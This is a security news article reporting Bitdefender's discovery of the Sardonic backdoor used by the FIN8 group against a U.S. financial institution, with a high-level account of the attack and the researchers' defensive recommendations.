FIN8 group used a previously undetected Sardonic backdoor in a recent attack

Pierluigi Paganini August 25, 2021

Financially motivated threat actor FIN8 employed a previously undocumented backdoor, tracked as ‘Sardonic,’ in recent attacks.

The financially motivated threat actor FIN8 has been observed employing a previously undetected backdoor, dubbed Sardonic, on infected systems.

The new backdoor was spotted by researchers from cybersecurity firm Bitdefender, it was discovered while investigating an unsuccessful attack carried out by FIN8 aimed at an unnamed financial institution in the U.S.

Sardonic is a sophisticated backdoor that supports a wide range of features that was designed to evade detection. According to the experts, Sardonic is a project still under development and includes several components, some of which were compiled just before the attack.

The group has been active since 2016, it leverages known malware such as PUNCHTRACK and BADHATCH to infect PoS systems and steal payment card data.

The activity of the group was spotted in March, after more than a year of apparent inactivity. The group focuses on organizations in the insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.

In the most recent attack investigated by BitDefender, the group conducted reconnaissance on the target network to gather information to use in the attack and conduct lateral movement and privilege escalation. The group also employed their BADHATCH backdoor.

“The BADHATCH loader was deployed using PowerShell scripts downloaded from the 104.168.237[.]21 IP address using the legitimate service. It was used during the reconnaissance, lateral movement, privilege escalation and possibly impact stages. There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked. We saw no traces of BADHATCH on these high-value targets. However, we identified one SQL server where some artifacts indicate that the threat actors intended to deploy both backdoors.” reads the report published by Bitdefender.

Sardonic backdoor

Sardonic is written in C++, it allows operators to gather system information, execute arbitrary commands, and load and execute additional plugins.

Below are the recommendations provided by the researchers to minimize the impact of financial malware:

• Separate the POS network from the ones used by employees or guests
• Introduce cybersecurity awareness training for employees to help them spot phishing e-mails.
• Tune the e-mail security solution to automatically discard malicious or suspicious attachments.
• Integrate threat intelligence into existing SIEM or security controls for relevant Indicators of Compromise.
• Small and medium organizations without a dedicated security team should consider outsourcing security
operations to Managed Detection and Response providers.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, FIN8)

[adrotate banner=”5″]

[adrotate banner=”13″]

you might also like

leave a comment